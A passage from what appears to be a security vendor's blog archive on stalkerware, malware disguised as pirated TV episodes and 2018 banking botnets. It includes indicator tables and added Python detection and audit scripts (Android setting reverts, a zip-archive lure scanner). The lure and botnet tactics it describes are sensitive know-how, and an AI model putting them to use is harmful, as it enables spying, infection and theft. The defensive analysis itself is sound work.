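    """appops_output maps package -> text printed by `appops get`. On Android 8+
    'Install unknown apps' is a per-app grant; a package in mode 'allow' can
    side-load APKs (the browser is exactly what the guide asks the user to allow)."""
    findings = []
    for pkg, raw in appops_output.items():
        match = APPOPS_MODE.search(raw)
        mode = match.group(1) if match else "default"   # "No operations." -> default
        if mode == "allow":
            findings.append(Finding(f"Install unknown apps granted to {pkg}", mode,
                                    f"adb shell appops set {pkg} REQUEST_INSTALL_PACKAGES default"))
    return findings


def audit(settings_output, appops_output):
    """Full list of settings that still need reverting after a stalkerware install."""
    return audit_settings(settings_output) + audit_install_sources(appops_output)


# Constructed sample: a device left exactly as the guide describes.
SAMPLE_SETTINGS = {
    ("secure", "install_non_market_apps"): "1\n",
    ("global", "package_verifier_enable"): "0\n",
}
SAMPLE_APPOPS = {
    "com.android.chrome": "REQUEST_INSTALL_PACKAGES: allow; time=+3d2h11m5s ago\n",
    "com.android.vending": "No operations.\n",
}

if __name__ == "__main__":
    for f in audit(SAMPLE_SETTINGS, SAMPLE_APPOPS):
        print(f"[!] {f.item}: observed {f.observed!r}\n    revert with: {f.revert}")
```

The point of the per-app check is that on current Android versions there is no single "unknown sources" switch to flip back: each package that was granted the right to install APKs has to be found and reverted individually.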

Their industry has gone way too far

What surprised us most in this research is that, apart from the programs being so easy to find online, they are extremely bold in their promotion and distribution. Forget dark web forums or underground markets: the developers of these applications have built their own economic environment. They provide different offers for different needs, with tariffs ranging from half a dollar per day to $68/month. Some of them even have their own Twitter accounts and blogs that are constantly updated and apparently managed by dedicated social media managers. The most outrageous programs continue to exist, including the infamous FlexiSpy, described by many as a data-breach catastrophe. In fact, when we researched it, we found a well-kept company blog presenting software updates and new features, accessible to anyone, along with an active Twitter account.

Moreover, some stalkerware companies are so open about their practices that they offer to deliver a phone with the program pre-installed, specifically for buyers who lack the technical skills to install the application themselves. This also gives the people who run the program an opportunity to gauge how skilled their customers are. The Reptilicus app is one of them: according to its official website, the company offers not only a stalkerware application, but an already backdoored phone.

According to statistics from 100% of our users, only 60% can independently configure the device to work properly. If you have any difficulties, or you just have no time to do this, we will do everything ourselves and send you a phone with the installed program.

As the whole stalkerware industry is growing year by year, it has spawned internal competition in an unregulated free-market economy. For example, this is the blogpost about iSpyoo stalkerware published by its competitor – Mspy:


The companies also have a whole mechanism to create fake reviews. This has been done by the Hoverwatch stalkerware service:


There is no need to prove the negative effects that commercial spyware brings, as its very concept is unethical. However, there are many further layers of threat that these programs bring to the user who installs them. They breach the rules of mobile application stores, breach security and leave the data of stalked victims exposed to exploitation by hackers. Later, that data can be used in all kinds of malicious activities, from financial extortion to identity theft. We can also safely say that there are people who benefit from this and can access this data, while their own identities, origins and location remain unknown.

Despite all the findings listed above, most cybersecurity vendors still don’t detect commercial spyware as a threat due to vague legal positioning on commercial surveillance.

However, starting from April 3, 2019, Kaspersky Lab will be notifying its Android users of such programs’ existence on their devices, with a special feature implemented in our Android security app.

All mentioned stalkerware products

Name | Sample MD5 | Official site | iOS version
MobileTool | 7229d6c4ddb571fb59c1402636c962c2 | hxxps://mtoolapp[.]net/, hxxps://mobiletool[.]ru/ | –
iSpyoo | 8ac6209894fff56cf2a83f56408e177d (copy9), a20911f85741ed0f96cb4b075b7a32c1 (thetruthspy) | hxxps://ispyoo[.]com/, hxxp://thetruthspy[.]com/ | +
Talklog | 5b20dace9cc15afc9a79332e4377adc2 | hxxps://talklog[.]net/ | –
Spy Phone App | bf090ca25d27d2e11dfe64cf0f7b645a | hxxps://www.spy-phone-app[.]com/, hxxps://easyphonetrack[.]com/ | +
Reptilicus | 9be7585e88c3697d1689fdd1456c2a52 | hxxps://reptilicus[.]net/ | +
Mobile Tracker Free | 847c5f78de89ed4850e705a97a323a1a | hxxps://mobile-tracker-free[.]com/ | –
Hoverwatch | 9559138aee33650d10f0810fdeb44b3e | hxxps://www.hoverspyapp[.]com/ | –
Mobile Spy | 62bc31db17343049ba70d0f8c9be0ba8 | hxxp://www.mobile-spy[.]com/ | –
FlexiSpy | 8514c499f825ca5682a548081c2e6c61 | hxxp://www.flexispyapp[.]com | +
MSpy | dee7466c8b58b2687bb003226ac96e6b | hxxps://www.mspy[.]com/ | +
FreeAndroidSpy | 1cb261cd82677124e6adac17a59707aa | hxxp://freeandroidspy[.]com/ | –

Game of Threats

1 April, 2019 - 12:00


While the way we consume TV content is rapidly changing, the content itself remains in high demand, and users resort to any means available to get at it – including illegal and non-ethical ones like the use of pirated stuff. The world is embracing the idea of paying for entertainment more and more with the development of paid subscription networks like Netflix or Apple Music. Yet many countries are still fighting the battle against illegally distributed content. In December 2018, Australia’s Federal Court issued an injunction requiring local internet providers to block 181 pirate domains linked to 78 websites full of files infringing copyright regulations. At the beginning of 2019, Brazil’s Ministry of Justice brought on board the Federal Police of Brazil (Polícia Federal) to launch an anti-piracy operation targeting the illegal distribution of music, movies and TV shows. These are just two of the many initiatives introduced both by governments and the private sector all over the world to combat the problem.

However, despite these measures, copyright-infringing content is still readily available. According to the latest Annual Piracy Report by Muso – a global technology company providing anti-piracy, market analytics and audience connection solutions – the number of pirated content consumers is growing. The company registered more than 300 billion visits to pirate websites in 2017 alone. That is a 1.6% increase from 2016, and the trend is international: the US supplied the greatest number of pirate website visitors with 27.9 billion visits per year, followed by Russia, 20.6 billion (a 46% increase from 2016), and India, whose residents visited pirate websites 17 billion times. A major share of pirated content still comes from downloadable files: a 2019 WebKontrol report claims that torrent websites are still leading in Russia in terms of volume of pirated content, followed by file-hosting and streaming services. Moreover, the share of links to illegal content posted on torrent websites grew 14% from 2018 (38% from 24%), overtaking streaming websites.

Being a lucrative source of content, torrents also prove to be a popular way of distributing malicious code, and there are many studies on how cybercriminals exploit that opportunity. According to the results of one such study published in 2015, bootlegged content represents 35% of files shared via BitTorrent, with more than 99% of the analyzed counterfeit files linked to either malware or scam websites. The recent findings by Kaspersky Lab and independent researchers have confirmed the continuation of this trend.

But what kind of content is being targeted? Originally, torrent trackers were the ‘go-to’ places for those seeking pirated versions of games and other software, as well as recent Hollywood blockbusters. Yet in recent years TV shows have become an extremely popular type of content among viewers all around the world – sometimes even more popular than Hollywood movies. According to the Muso report, TV content is clearly of interest to one third of all users consuming copyright-infringing content: TV shows remain the most popular product among users with 106.9 billion visits last year, followed by music (73.9 billion) and films (53.2 billion).

Such popularity has not escaped the eye of cybercriminals, either. To find out exactly how they capitalize on the rise in illegal downloads of TV content, we have researched the landscape of malware threats disguised as new episodes of popular TV shows distributed through torrent websites. Our goal was to see which TV series were the most popular with the malware pushers and to take a closer look at what kind of threats are distributed that way.

Methodology and key findings

To make sure the TV series we focused on were in high demand and sufficiently relevant, we made a list of the most popular TV shows in 2018 using various public sources like IMDB, Rotten Tomatoes and other online ratings, plus lists of the most pirated TV shows, which also indicate how popular a particular show may be. We listed a total of 45 titles, but as some of the more popular ones appeared in several different rankings at the same time, we made a few revisions and came up with a final list of 31 TV shows (according to various public ratings like IMDB, Rotten Tomatoes, TorrentFreak, etc., in alphabetical order).

  1. Altered Carbon
  2. American Horror Story
  3. Arrow
  4. Better Call Saul
  5. Daredevil
  6. DC’s Legends of Tomorrow
  7. Doctor Who
  8. Game of Thrones
  9. Grey’s Anatomy
  10. Homeland
  11. House of Cards
  12. Killing Eve
  13. Legends of Tomorrow
  14. Modern Family
  15. Roseanne
  16. Sharp Objects
  17. Stranger Things
  18. Suits
  19. Supernatural
  20. The Big Bang Theory
  21. The Flash
  22. The Good Doctor
  23. The Good Place
  24. The Handmaid’s Tale
  25. The Haunting of Hill House
  26. The Walking Dead
  27. The X-files
  28. This Is Us
  29. Vikings
  30. Westworld
  31. Young Sheldon

We then ran each title against our threat database. Using aggregated threat statistics from the Kaspersky Security Network (KSN) – the infrastructure dedicated to processing cybersecurity-related data streams from millions of volunteers around the world – we checked whether the users who had agreed to share threat statistics with KSN had ever encountered malware when dealing with the corresponding TV show titles.

Next, we identified the episodes of the most popular TV shows used to disguise malware, to find out whether there was any correlation between the number and order of episodes in any given season and the malware pushers’ interest in them.

In addition, we estimated how effective each disguise was, how successful a bait each TV show was, and the overall potential of the setup as a source of spreading malware. To do that, we divided the total number of unique attacked users by the number of malicious files, and did the same for each TV series. This gave us the average number of users reached by at least one TV-show-themed malicious file which, to some extent, allowed us to identify the TV show that worked best as a decoy.

Finally, we looked at what kind of threats are more likely to hit users under the cover of popular series.

These are our key findings:

  • The total number of users who encountered TV-show-related malware in 2018 is 126,340 globally, one-third less than in 2017. The number of attacks by such malware has seen a decrease of 22% to 451,636 registered attempts
  • The top three TV shows most often used for bait and used to attack the greatest number of users: Game of Thrones, The Walking Dead and Arrow
  • Game of Thrones accounted for 17% of all the infected pirated content in 2018, with 20,934 users attacked, despite being the only TV show in the list that didn’t have new episodes released in 2018
  • The first and the last episodes of each Game of Thrones season we analyzed turned out to be the most dangerous, accounting for the greatest number of malicious files in Kaspersky Lab’s collection and affecting the most users
  • ‘Winter Is Coming’ – the very first episode of the show – was the one most actively used by cybercriminals
  • Within two years we detected 33 types and 505 different families of threats hiding behind the Game of Thrones title
  • On average, 2.23 users were attacked, and seven attack attempts were registered, per malware file disguised as a TV show
  • American Horror Story proved to be the most effective malware cover – each malicious file hidden behind the title has reached an average of three users
  • Not-a-virus:Downloader and Not-a-virus:AdWare turned out to be two of the most popular threats delivered via TV show content, the most popular one being the dangerous malware type called Trojan

General Overview: malware is coming

The analysis of malicious payloads guised as popular TV series names, and a comparison between the results for years 2017 and 2018, has demonstrated a decrease in the numbers of such malware files, attacks and affected users.

A total of 126,340 users were attacked – one third less than in 2017 (188,769). The decline is smaller than that seen elsewhere. For example, a recent report showed that the number of users affected by malware delivered via popular content, including porn, fell by 45% in 2018.

Like the user count, the malware count also declined: in 2017, a year rich in malware, we added 82,091 samples to our database, yet in 2018 that number dropped 30% to 57,133.

Torrent website offering all sorts of pirated content

The total number of attacks detected by our security solutions also dropped, but only by 22%, down to 451,636.

Such a decline might be connected to some of this year’s events potentially affecting the number of torrent file downloads. First, in 2018, Google downranked more than 65,000 torrent websites – major distributors of pirated TV shows – leaving a great many users unable to find them when looking for TV series downloads. Active action against torrent websites does make a difference, with more and more of them being blocked or disrupted. For example, two major torrent trackers (Pirate Bay and Demonoid) have recently suffered outages, and one of the world’s longest-standing ones, Leechers Paradise, was shut down for good.

In response, websites streaming pirated copies of movies and TV series are becoming more and more popular, draining the audience from the torrents.

Yet torrents are still running high and – based on our statistics – attempts to harm users are still registered. To measure how effective such malware is, we compared the overall number of unique users attacked with the number of malicious files detected. By dividing the number of users by the number of files we found that every TV show malware file has infected an average of 2.23 users in 2018.

Additionally, we compared the list of the most popular torrents in 2018 with the list of the most infected TV series.

The most popular TV show torrents | Top TV shows used to cover up malware
The Walking Dead | Game of Thrones
The Flash | The Walking Dead
The Big Bang Theory | Arrow
Vikings | Suits
Titans | Vikings
Arrow | The Big Bang Theory
Supernatural | Supernatural
Westworld | Grey’s Anatomy
DC’s Legends of Tomorrow | This Is Us
Suits | The Good Doctor

The most popular torrents of 2018 as reported by TorrentFreak versus the most popular malware-decoy TV series titles

As seen from the table above, six out of 10 TV series are featured on both lists, which we would expect: the more popular a TV show is, the more likely it is to be used by cybercriminals. At the same time, several shows that had been heavily promoted by their makers and were considered to be at the top in terms of popularity – Westworld, DC’s Legends of Tomorrow and a few more – didn’t make it to the top of disguised infections. This, in a way, may reflect the real popularity of these titles.

The M-files: most often infected series

Of course, some TV series are more popular among cybercriminals than others – and threat statistics prove that. To understand which of them attract threat actors the most, we reviewed the number of malware files hidden behind each popular TV show title, the number of times they attacked users and the number of users affected by such attacks. The leaders turned out to be Game of Thrones, The Walking Dead, Arrow, Suits, Vikings, The Big Bang Theory, Supernatural, Grey’s Anatomy, This Is Us, and The Good Doctor. The latter replaced House of Cards, which rounded out the top 10 in 2017.

‘Malicious files’ represents the number of unique samples of malware encountered by our users; ‘Attacks’ stands for the number of times our security solutions reported detects, and ‘Users attacked’ means users attacked by TV-series-related malware at least once.

Top 10 TV shows used as a disguise for malware in 2018

Of all the TV series analysed, Game of Thrones had the greatest number of users attacked by malware of the same name – 20,934. It tried to infect users 129,819 times, and the total number of Game of Thrones-themed malware files in our threat collection is 9,986. This makes the show an unmatched leader in popularity not just among users but also among cybercriminals looking for the most effective way to distribute malware.

A year before, in 2017, the wave of Fire and Ice-themed malware was even bigger with almost twice as many users affected and malware files: 42,330 and 19,180, respectively. The number of attacks in 2017 exceeds the 2018 figure by 22% with 167,691 detects.

Top 10 malware disguised as a TV show by the share of users attacked in 2017

Top 10 malware disguised as a TV show by the share of users attacked in 2018

The second place, both in 2017 and 2018, was occupied by The Walking Dead, with 18,794 users attacked, and the third by Arrow (12,163 users). The gap of 380 between the number of users attacked by malware disguised as The Walking Dead versus Game of Thrones seems insignificant. However, we need to remember that Game of Thrones is the only TV series in the top 10 that was not even broadcast during 2018 – the period for which the statistics were gathered.

For comparison, we looked at similar rankings in 2017, when all three TV shows were releasing episodes live. As seen from the graph below, the difference between Game of Thrones and The Walking Dead was more pronounced, with the number of users attacked by Game of Thrones malware exceeding The Walking Dead and Arrow figures by 33% and 50%, respectively.

Top three TV shows used as a disguise for online threats

We also took a closer look at individual episodes from the two latest seasons (six and seven) of Game of Thrones and the original first season. The results revealed that the number of infected files spotted by our protection technologies differed significantly from episode to episode. The common theme we spotted was that the first and last episodes of each season were used as a disguise for malware, and that the titles of these opening and closing episodes were used far more actively to hide malware than those of other episodes.

Game of Thrones episodes: number of infected files and unique users attacked in seasons 1, 6 and 7

Due to the huge time and resource requirements of such an analysis, we did not examine any other series at episode level. But based on what we have on these three seasons of GoT, it is a safe bet that other series are exploited in much the same way.

What we cannot assume, however, is that a disguise which reached a significant number of users is also the most effective method of distribution. As we mentioned earlier, malware files disguised as TV show episodes (whichever show) hit an average of 2.23 users in 2018. Out of the top 10 TV shows used for cyberattacks, Game of Thrones was only seventh in terms of the ratio of malicious files to affected users. Moreover, it proved to be a less effective bait than average, with one malicious file disguised as Game of Thrones for every 2.1 users attacked.

We looked at the files to users ratio when analyzing each TV series from the top 10. The files named after The Walking Dead proved to be the most successful, with 2.69 users attacked on average. Second place went to Grey’s Anatomy with 2.65, and third to Supernatural with 2.34.

Later we also checked the remaining TV shows that were analyzed by us but did not make it to the top 10.

Surprisingly, it turned out that the most successful and productive files were hiding behind TV shows that did not make it into the top 10. Each malicious file of the American Horror Story blood line reached an average of three users in 2018, lifting itself from fourth place in the 2017 ratings. Back then the top three most effective malware files pretending to be TV shows looked different: Modern Family occupied third position with 2.95, and Grey’s Anatomy was second with three. Each file of The Big Bang Theory line was able to reach 3.15 users and topped the list, yet in 2018 it fell dramatically to eighth position.

Average number of users dealing with TV series-disguised malware files in 2017

Average number of users dealing with TV series-disguised malware files in 2018

Threat Anatomy: attack vectors and types of threats

To investigate what type of TV show-disguised threats are more likely to infect the users’ computers, we extracted infected samples of the most popular TV shows in 2017 and 2018 and counted the different types and families of threats.

We detected a total of 33 threat types and 505 different families hiding behind the Game of Thrones TV show title. The top three threat categories among these were: Trojan, accounting for almost one third of all threats; not-a-virus:Downloader with 21%; and not-a-virus:AdWare with 28%. The ‘not-a-virus’ type of threat is usually not classified as malware, yet such programs may interfere with users’ sessions, causing unwanted actions to be performed. AdWare, for instance, can show unsolicited ads, alter search results and collect user data to deliver targeted, contextual advertising.

Top 10 most popular malware types by the share of unique users attacked in 2017-2018

Top 10 most popular malware families by the share of unique users attacked in 2017-2018

As we looked at the statistics of threat types and threat families, we realized that the top-three most popular families represented the three most popular types of threats.

The most widespread threat: Trojans

According to the statistics, the most common type of threat was Trojan, and in 17% of all cases users of pirated TV shows had to deal with worms of the Trojan.WinLNK.Agent family. A Trojan is a dangerous type of malware able to cause much harm, from information theft to taking control of the infected system. The Trojan family pretending to be Game of Thrones that most actively attacked users usually takes the form of a shortcut to the file and is distributed in various ways, usually through emails or questionable websites.

Example of a Trojan disguised as a TV show downloaded to a PC

The common scenario is this: the user downloads a torrent file or receives an archive with a shortcut by email. At first glance the package contains a copy of the long-awaited episode.

Yet, apart from the shortcut, the archive will also contain a hidden folder with the ‘system’ attribute on, making it invisible even if Windows Explorer is configured to display hidden files.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC.

By clicking on the shortcut in the hope of watching the video, the user launches the AutoIt script sitting in the hidden folder along with its interpreter and several other .lnk files.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC.

Example of behavior of a Trojan disguised as a TV show downloaded to a PC.

The AutoIt script is a worm that spreads through removable disks and runs a backdoor, which is then added to autorun (by writing the paths of the .lnk files from the hidden folder) and used to carry out the following actions:

  1. Display a specified message
  2. Execute commands in cmd.exe
  3. Download files to %Temp% and launch them
  4. Shutdown/restart computer
  5. Go to a specified URL
  6. Auto-click various webpage items
  7. Terminate, restart, update itself

Not-a-virus rounds out the top three

The second and third place in the rating list of the most popular types of threats and their families are occupied by the not-a-virus families, also known as potentially unwanted software: adware and downloaders.

One of the most popular threat families is not-a-virus:AdWare.Win32.FileTour. Kaspersky Lab classifies it as a type of AdWare. While technically AdWare may be legitimate software, in many cases users have to deal with file partner programs that try to install partner software and sometimes also download malware to their computers. Unlike the not-a-virus programs themselves, the malware they deliver can vary in type and include malicious miners, password stealers, banking Trojans, and so forth. This happens because the owners of file partner programs often neither know, nor want to check, what kind of software they distribute.

Just like not-a-virus:Downloader – another popular not-a-virus threat we will be describing in more detail later – it is distributed through download portals, yet unlike Downloaders it can also be spread through torrent trackers.

Example of an internet page on a PC with adware installed.

Another distinguishing feature of adware compared to the relatively innocent not-a-virus:Downloader is the use of more aggressive strategies. AdWare can trick its way into the users’ devices and play dirty, for instance, by disguising executable files (.exe files) as media (for example, The.Walking.Dead.S06E04.FASTSUB.VOSTFR.HDTV.XviD-ZT.avi.exe).
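
The two tricks described above, the shortcut-plus-hidden-folder layout of Trojan.WinLNK.Agent and the adware habit of naming an executable like a video file, can both be spotted before anything is extracted. The following Python script is an added example (not code from the article or from Kaspersky Lab) that inspects a zip archive’s entries for a shortcut sitting beside a folder carrying the MS-DOS hidden+system attributes, and for names whose last extension is executable while the one before it is a media type. The archive it scans is constructed in memory, and the folder and file names inside it are invented stand-ins for the layouts the article describes.

```python
"""Flag zip archives that match the two lures described in the article:
a .lnk beside a hidden+system folder (Trojan.WinLNK.Agent layout) and an
executable named like a video file (.avi.exe). Added example; the archive
built by build_sample() is constructed and contains no real payload."""
import io
import zipfile

# MS-DOS attribute bits. zipfile keeps them in the low byte of
# ZipInfo.external_attr for entries written by Windows archivers.
FAT_HIDDEN = 0x02
FAT_SYSTEM = 0x04
FAT_DIRECTORY = 0x10

MEDIA_EXT = {".avi", ".mkv", ".mp4", ".mov", ".wmv", ".mpg"}
EXEC_EXT = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".pif"}


def dos_attrs(info: zipfile.ZipInfo) -> int:
    return info.external_attr & 0xFF


def extensions(name: str) -> list:
    """All dotted suffixes of the entry's base name: 'a.avi.exe' -> ['.avi', '.exe']."""
    base = name.rstrip("/").rsplit("/", 1)[-1].lower()
    return ["." + part for part in base.split(".")[1:]]


def scan_archive(data: bytes) -> list:
    """Return (rule, entry name) pairs for every suspicious entry in the archive."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    findings = []
    stealth = FAT_HIDDEN | FAT_SYSTEM
    stealth_dirs = [i.filename for i in infos
                    if i.is_dir() and dos_attrs(i) & stealth == stealth]
    shortcuts = [i.filename for i in infos if extensions(i.filename)[-1:] == [".lnk"]]
    # Rule 1: a shortcut to "the episode" alongside a hidden+system folder that
    # holds the interpreter, the script and further shortcuts.
    if shortcuts and stealth_dirs:
        for name in shortcuts:
            findings.append(("shortcut-beside-hidden-system-folder", name))
        for i in infos:
            if not i.is_dir() and any(i.filename.startswith(d) for d in stealth_dirs):
                findings.append(("file-in-hidden-system-folder", i.filename))
    # Rule 2: an executable whose name ends in a media extension before .exe etc.
    for i in infos:
        exts = extensions(i.filename)
        if len(exts) >= 2 and exts[-1] in EXEC_EXT and exts[-2] in MEDIA_EXT:
            findings.append(("executable-named-as-media", i.filename))
    return findings


def build_sample(malicious: bool = True) -> bytes:
    """Constructed archive mimicking the article's layouts (names are invented)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if malicious:
            zf.writestr("Game.of.Thrones.S07E01.mkv.lnk", b"L\x00\x00\x00 constructed shortcut")
            hidden = zipfile.ZipInfo("cache/")
            hidden.create_system = 0  # mark the entry as written on Windows
            hidden.external_attr = FAT_DIRECTORY | FAT_HIDDEN | FAT_SYSTEM
            zf.writestr(hidden, b"")
            zf.writestr("cache/AutoIt3.exe", b"MZ constructed interpreter stub")
            zf.writestr("cache/worm.au3", b"; constructed script")
            zf.writestr("cache/run.lnk", b"L\x00\x00\x00 constructed shortcut")
            zf.writestr("The.Walking.Dead.S06E04.FASTSUB.VOSTFR.HDTV.XviD-ZT.avi.exe",
                        b"MZ constructed")
        else:
            zf.writestr("Game.of.Thrones.S07E01.mkv", b"constructed video bytes")
            zf.writestr("readme.txt", b"constructed")
    return buf.getvalue()   # central directory is written when the 'with' block closes


if __name__ == "__main__":
    for rule, name in scan_archive(build_sample()):
        print(f"{rule:40} {name}")
    print("clean archive:", scan_archive(build_sample(malicious=False)))
```

Only the low byte of external_attr is examined, so entries written by a Unix archiver (where that byte is normally zero) will not trigger the folder rule; in that case the shortcut itself and the double extension remain the signals to act on.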

Example of an internet page on a PC with adware installed.

The third place is held by the not-a-virus:Downloader threat. This threat type can be completely innocent yet annoying as it will attempt to download utilities. Positioned as software made to simplify downloading files from the internet, the threat is used to distribute the leading malware family hiding behind the Game of Thrones title – MediaGet (we put it in the not-a-virus family: Downloader.Win32.MediaGet) – as well as many others such as uBar, AppDater, etc.

The typical not-a-virus:Downloader distribution scheme is quite simple: the user visits a website in search of a TV show or another media file and sees many different ‘download’ buttons.

Example of a hidden download agreement in not-a-virus:Downloader.

It is very difficult to figure out which one leads to the desired TV episode, so the user often ignores or misses the information displayed like ‘download using the download manager’.

As a result, instead of the video the user gets nothing but a utility-loader through which the content can be potentially downloaded.

Example of a not-a-virus:Downloader.

Downloader utilities themselves are usually quite harmless, yet they are trying to cement themselves firmly into the system and may show unwanted ads or suggest additional unwanted software. This is not dangerous but rather annoying.

Danger Things: how to stay safe

As the world tightens up policies regarding pirated content and treats intellectual property more like physical property, malware distributors seem to be leaving file hosting and torrent websites. But, as we said earlier, this might be due to increased popularity of streaming websites that do not require files to be downloaded, yet might be a source of different threats.

At the same time, we’ve seen that the number of users faced with TV-series-themed malware is still quite large, and this threat is proving problematic to those who look for free content on the internet, especially when it comes to extremely popular shows like Game of Thrones, The Walking Dead and Arrow. Game of Thrones deserves a special mention, as it was one of the very few series that had no new episodes out last year but still topped the malware charts, according to Kaspersky Lab telemetry.

That said, it won’t come as a big surprise to see a new wave of malicious activity accompanying the release of the final season of Game of Thrones in April 2019.

The best way to avoid falling victim to such tactics, and to make sure you safely enjoy yet another episode of your favorite TV series rather than being hit by a Trojan that would zombify your PC, is to use only legitimate sources of content. But even if you follow that rule, stay alert, as it is quite possible to encounter malicious activity accidentally.

To avoid threats coming from untrusted content distributing platforms, we recommend:

  • Pay close attention to website authenticity and do not visit them unless you are sure they are legitimate
  • Always make sure the website is genuine by double-checking the URL format or company name spelling before you download. Fake websites may look just like the real thing, but there will be anomalies to help you spot the difference
  • Pay attention to the extension of the downloaded file. If downloading TV show episodes, the file must not end in .exe
  • Be careful about the torrents you use and do look up the comments about the downloadable files. If comments are unrelated to the content, you are probably looking at malware
  • Don’t click on suspicious links promising exclusive early premiere of the latest episodes; consult the TV show schedule and keep track of it
  • Use reliable security solutions for comprehensive protection against a wide range of threats, such as Kaspersky Internet Security

Bots and botnets in 2018

29 March, 2019 - 13:00

Due to the wide media coverage of incidents involving Mirai and other specialized botnets, their activities have become largely associated with DDoS attacks. Yet this is merely the tip of the iceberg, and botnets are used widely not only to carry out DDoS attacks, but to steal various user information, including financial data. The attack scenario usually looks as follows:

  1. An attempt is made to infect a device with malware (if the botmaster’s aim is financial, a Trojan banker is deployed). If successful, the malware-infected device becomes part of the botnet under the control of a C&C center.
  2. The malware on the infected device receives a command from C&C containing the target mask (for example, the URL of an online banking service) and other data required for the attack.
  3. Having received the command, the malware monitors the actions of the user of the infected device and carries out the attack when that user visits a resource that matches the target mask.

Main types of botnet-assisted attacks are:

Unlike DDoS attacks, which affect the web resources of the victim organization, the attacks investigated in this report target the clients of the organization. The result of a successful attack can be:

  • Interception of user credentials
  • Interception of bank card data
  • Substitution of the transaction addressee (for example, the recipient of a banking transaction)
  • Another operation performed without the user’s knowledge, but in their name

Such scenarios are valid not only for the user’s bank accounts, but for other services too, as we shall see later.


Kaspersky Lab tracks botnet actions using the Botnet Monitoring technology, which emulates infected computers (bots) to obtain real-time data on the actions of botnet operators.

This analysis includes unique attacks registered by Botnet Monitoring in 2017 and 2018 and revealed by analysis of intercepted bots’ configuration files and C&C commands.

The attack target is the URL mask, extracted from the bot configuration file or the intercepted command (for example, the URL mask of an online banking site).

The ‘malware family’ in this report refers to publicly known names of malware, for example, ZeuS, TrickBot (Trickster), Cridex (Dridex, Feodo, Geodo, etc.), Ramnit (Nimnul).

Examples of target masks contained in registered commands

A unique attack in this analysis is taken as the unique combination of the target mask and the malware family (or its modification) that received the attack command. The rest of the data (injected scripts, rules for cryptowallets or URLs substitution, traffic redirection rules, patterns for credentials interception, etc.) were not taken into account when determining the uniqueness of an attack.

Excluded from the analysis are attacks on the resources of companies that develop anti-malware solutions, since such attacks are self-protection measures taken by the malware to prevent treatment of an infected device (that is, to block the download of a security solution). We also excluded attacks in which we could not uniquely identify the target, i.e. where no additional information about the target could be obtained from the target mask (for example, the “* bank *” target of BetaBot is not included in the analysis).

Only the number of unique attacks is taken into account, and not the total number of attacks of each particular family, because different families may receive commands with different frequencies.

The results are based on an analysis of commands from more than 60,000 different C&C centers linked to 150 malware families and their modifications.


The total number of unique attacks on clients of organizations registered by Botnet Monitoring technology in 2018 fell by 23.46% against the previous year (from 20,009 attacks in 2017 to 15,314 in 2018).

At the same time, 39.35% of the attacks we observed in 2018 were new, that is, the combination of the target mask and the family that received the attack command was not encountered in 2017. This is linked to both the emergence of new bankers (Danabot, BackSwap) and the desire of malware creators to change their target scope.

The geography of attack targets in 2017 covered 111 countries; in 2018, attempts were made to attack clients of organizations in 101 countries.

Cybercriminals’ targets

To start with, we will examine the clients of which organizations are cybercriminals’ preferred targets.

In 2017, the largest share of attack targets belonged to the Financial Services category (77.44%). This includes online banking services, multibanking services, online stores, and other resources related to financial transactions (not including cryptocurrencies). This result is to be expected due to the greatest potential gains for the cybercriminals, who in the event of a successful attack gain direct access to the victim’s finances.

In second place by number of unique attacks is the Global Portals and Social Networks category (6.15%), which includes search engines, email services, and social networks. Search engines are placed in this group, because typically the main page of such systems provides a mailbox login form through which intruders try to steal credentials using the types of attacks described above.

Third place in our ranking goes to resources that provide various products and services (5.08%), but are not online stores. For example, hosting providers. In this case, as in the first category, the target is victims’ payment details. These resources are assigned to a separate group, since they offer a specific product or service, which indicates how precise the cybercriminals’ targeting can be.

Distribution of the number of unique attacks by attack target, 2017

Distribution of the number of unique attacks by attack target, 2018

In 2018, there were minor changes in the Top 3 targets of attacks on clients of various organizations. Interestingly, the share of unique attacks on financial services dropped by 3.51 p.p. to 73.93%.

The target mask received by the bot nearly always contains a domain or part of one. After analyzing the domains of masks pertaining to financial organizations (banks, investment, credit, pension institutions, etc.), we compiled a map of organizations whose clients were attacked by bots in 2018. The map indicates the numbers of financial organization domains observed in commands sent to bots.

It should be noted that one organization can own several domains, for example, divided according to a country’s territories.

Domain map of financial organizations observed in target masks, 2018

2018 saw a rise in botmasters’ interest in cryptocurrencies: The number of unique attacks on users linked to cryptocurrency services (exchanges, cryptocurrency wallets, etc.) increased, with their share more than tripling (up 4.95 p.p.) to 7.25%.

Cybercriminals actively tried to monetize interest in cryptocurrencies and obtain data from victims to steal funds. The majority of attacks that we detected on users of cryptocurrency services featured Ramnit Banker (53%). In addition, the Chthonic and Panda bankers, both modifications of the notorious ZeuS banker, dramatically increased the number of unique masks linked to cryptocurrency wallets and exchanges. The CapCoiner Trojan, which specifically targets such resources, also displayed major activity in this area.

Distribution of Trojan families by share of attacks on users of cryptocurrency services, 2018

Geography of attack targets

Note: If the target mask contains a TLD (top-level domain) that can be used to determine the country, this country is entered in the statistics. If the country cannot be determined from the TLD (for example, .com), the country where the organization’s headquarters are located is entered in the statistics.
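The uniqueness rule (target mask plus malware family) and the country-attribution rule just described can be applied mechanically to intercepted commands. The following Python sketch is an added example and not the report’s own tooling: the ccTLD table, the headquarters lookup, the family names and the commands are all constructed placeholders, and masks without an identifiable host are dropped the way the methodology section says they were.

```python
from urllib.parse import urlsplit

# Constructed ccTLD table for the example; a real analysis needs the full list.
CCTLD_COUNTRY = {
    "uk": "Britain", "de": "Germany", "it": "Italy", "ca": "Canada",
    "au": "Australia", "fr": "France", "es": "Spain", "ch": "Switzerland",
    "cn": "China", "us": "United States",
}

# Constructed headquarters lookup, used when the TLD is generic (.com, .net, ...).
HQ_COUNTRY = {"example-bank.com": "United States", "coinmarket.net": "Luxembourg"}

# Constructed (family, mask) commands as a bot would receive them from C&C.
SAMPLE_COMMANDS = [
    ("FamilyA", "*example-bank.com/login*"),
    ("FamilyA", "*example-bank.com/login*"),          # repeated: same unique attack
    ("FamilyB", "*example-bank.com/login*"),          # same mask, other family: new one
    ("FamilyA", "https://online.example-bank.co.uk/*"),
    ("FamilyB", "*coinmarket.net/*"),
    ("FamilyC", "* bank *"),                          # no identifiable target: excluded
]


def domain_from_mask(mask: str):
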